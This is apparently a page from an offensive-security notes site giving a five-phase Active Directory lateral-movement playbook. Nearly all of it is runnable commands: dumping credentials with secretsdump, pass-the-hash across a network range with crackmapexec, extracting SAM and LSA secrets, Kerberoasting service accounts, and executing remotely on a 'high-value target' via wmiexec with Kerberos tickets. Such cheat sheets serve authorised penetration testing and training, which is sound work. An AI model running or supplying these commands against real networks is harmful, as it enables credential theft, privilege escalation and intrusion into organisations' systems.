Lateral Movement Strategy

# Phase 1: Initial credential extraction
python3 secretsdump.py <domain>/<username>:<password>@<initial-target>

# Phase 2: Pass-the-hash to nearby systems
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash> --continue-on-success

# Phase 3: Extract additional credentials from new systems
crackmapexec smb <new-targets> -u '<username>' -H <NTLM-hash> --sam --lsa

# Phase 4: Privilege escalation through service accounts
python3 GetUserSPNs.py <domain>/<username> -hashes :<NTLM-hash> -dc-ip <DC-IP> -request

# Phase 5: Kerberos-based lateral movement
export KRB5CCNAME=<service-account>.ccache
python3 wmiexec.py <domain>/<service-account>@<high-value-target> -k -no-pass

PreviousLiving off the Land (LotL)NextAdvanced AD Attacks

Last updated 1 month ago

Was this helpful?